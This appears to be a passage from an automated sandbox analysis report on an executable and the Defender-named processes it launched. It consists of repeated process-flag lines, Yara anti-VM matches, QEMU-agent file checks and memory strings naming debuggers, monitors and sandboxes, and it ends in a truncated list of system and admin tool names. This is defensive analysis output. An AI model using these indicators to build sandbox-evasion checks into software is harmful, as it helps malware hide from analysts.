Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B627A379-2F05-4FC9-AE9A-5C8B44C71D64\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-728dfe11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\B196999D-FA7B-4B75-AEDB-788BC8FFEE55\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5daeae.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f5a3aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f8ae31f.133.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.MpSigStub.exe.21b5f62017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.18262254549.0000021B5E967000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18308013985.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18275538227.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18284863225.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18301726224.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18305427613.0000021B5E314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.18278226414.0000021B5E924000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5004, type: MEMORYSTR
Tries to detect Any.run
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\1gPmnCR2PX.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp Binary or memory string: PEID.EXE
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18280386458.0000021B5DDC2000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: MpSigStub.exe, 0000000B.00000003.18267435419.0000021B5E8B8000.00000004.00000001.sdmp Binary or memory string: API_LOG.DLL
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !E!#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp Binary or memory string: "G!#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp Binary or memory string: "H!#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXE
Source: MpSigStub.exe, 0000000B.00000003.18318703518.0000021B5E146000.00000004.00000001.sdmp Binary or memory string: &[!#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 0000000B.00000003.18268730324.0000021B5F3B9000.00000004.00000001.sdmp Binary or memory string: $C:\PROGRAMDATA\SANDBOXIE\SBIEDLL.DLL
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18318703518.0000021B5E146000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNSC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE
Source: MpSigStub.exe, 0000000B.00000003.18280386458.0000021B5DDC2000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp Binary or memory string: REGMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLSBIEDLLX.DLLHTTP://
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: SANDBOXIEDCOMLAUNCH.EXE
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp Binary or memory string: \MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 0000000B.00000003.18262797138.0000021B5E20D000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNSC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: MpSigStub.exe, 0000000B.00000003.18297305290.0000021B5EB34000.00000004.00000001.sdmp Binary or memory string: %Z!#SLF:AGGR:MASQUERADE_AS!AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18281753919.0000021B5FD9B000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp Binary or memory string: &\MSNSNIFFER\MSNSNIFFER.EXE]
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:COPYRENAMED!AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: MpSigStub.exe, 0000000B.00000003.18279336685.0000021B5F9E8000.00000004.00000001.sdmp Binary or memory string: |ACCESSCHK.EXE|ACCESSCHK64.EXE|ACCESSENUM.EXE|ACRORD32.EXE|ADEXPLORER.EXE|ADINSIGHT.EXE|ADRESTORE.EXE|APPLICATIONFRAMEHOST.EXE|APPVCLIENT.EXE|APPVLP.EXE|ATBROKER.EXE|AUDIODG.EXE|AUTORUNS.EXE|AUTORUNS64.EXE|AUTORUNSC.EXE|AUTORUNSC64.EXE|BASH.EXE|BGINFO.EXE|BGINFO64.EXE|BITSADMIN.EXE|BROWSER_BROKER.EXE|CALC.EXE|CDB.EXE|CERTUTIL.EXE|CLOCKRES.EXE|CLOCKRES64.EXE|CMD.EXE|CMDKEY.EXE|CMSTP.EXE|CONHOST.EXE|CONSENT.EXE|CONTIG.EXE|CONTIG64.EXE|CONTROL.EXE|COREINFO.EXE|CSC.EXE|CSCRIPT.EXE|CSI.EXE|CSRSS.EXE|CTFMON.EXE|CTRL2CAP.EXE|DASHOST.EXE|DATAEXCHANGEHOST.EXE|DBGVIEW.EXE|DFSVC.EXE|DISK2VHD.EXE|DISKEXT.EXE|DISKEXT64.EXE|DISKSHADOW.EXE|DLLHOST.EXE|DNSCMD.EXE|DNX.EXE|DXCAP.EXE|ESENTUTL.EXE|EXPAND.EXE|EXPLORER.EXE|EXTEXPORT.EXE|EXTRAC32.EXE|FINDLINKS.EXE|FINDLINKS64.EXE|FINDSTR.EXE|FONTDRVHOST.EXE|FORFILES.EXE|FXSSVC.EXE|GPSCRIPT.EXE|GPUP.EXE|HANDLE.EXE|HANDLE64.EXE|HEX2DEC.EXE|HEX2DEC64.EXE|HH.EXE|IE4UINIT.EXE|IEEXEC.EXE|INFDEFAULTINSTALL.EXE|INSTALLUTIL.EXE|JUNCTION.EXE|JUNCTION64.EXE|LDMDUMP.EXE|LIVEKD.EXE|LIVEKD64.EXE|LOADORD.EXE|LOADORD64.EXE|LOADORDC.EXE|LOADORDC64.EXE|LOCKAPP.EXE|LOGONSESSIONS.EXE|LOGONSESSIONS64.EXE|LSAISO.EXE|LSASS.EXE|MAKECAB.EXE|MAVINJECT.EXE|MFTRACE.EXE|MICROSOFTEDGE.EXE|MICROSOFTEDGECP.EXE|MICROSOFTEDGESH.EXE|MSBUILD.EXE|MSCONFIG.EXE|MSDEPLOY.EXE|MSDT.EXE|MSDTC.EXE|MSHTA.EXE|MSIEXEC.EXE|MSXSL.EXE|NETSH.EXE|NLNOTES.EXE|NLTEST.EXE|NOTES.EXE|NOTMYFAULT.EXE|NOTMYFAULT64.EXE|NOTMYFAULTC.EXE|NOTMYFAULTC64.EXE|NTFSINFO.EXE|NTFSINFO64.EXE|NTOSKRNL.EXE|NVUDISP.EXE|NVUHDA6.EXE|ODBCCONF.EXE|OPENWITH.EXE|PAGEDFRG.EXE|PCALUA.EXE|PCWRUN.EXE|PENDMOVES.EXE|PENDMOVES64.EXE|PIPELIST.EXE|PIPELIST64.EXE|POWERSHELL.EXE|PRESENTATIONHOST.EXE|PRINT.EXE|PROCDUMP.EXE|PROCDUMP64.EXE|PROCEXP.EXE|PROCEXP64.EXE|PROCMON.EXE|PSEXEC.EXE|PSEXEC64.EXE|PSFILE.EXE|PSFILE64.EXE|PSGETSID.EXE|PSGETSID64.EXE|PSINFO.EXE|PSINFO64.EXE|PSKILL.EXE|PSKILL64.EXE|PSLIST.EXE|PSLIST64.EXE|PSLOGGEDON.EXE|PSLOGGEDON64.EXE|PSLOGLIST.EXE|PSLOGLIST64.EXE|PSPASSWD.EXE|PSPASSWD64.EXE|PSPING.EXE|PSPING64.EXE|PSR.EXE|PSSERVICE.EXE|PSSERVICE64.EXE|PSSHUTDOWN.EXE|PSSUSPEND.EXE|PSSUSPEND64.EXE|PWSH.EXE|RAMMAP.EXE|RCSI.EXE|R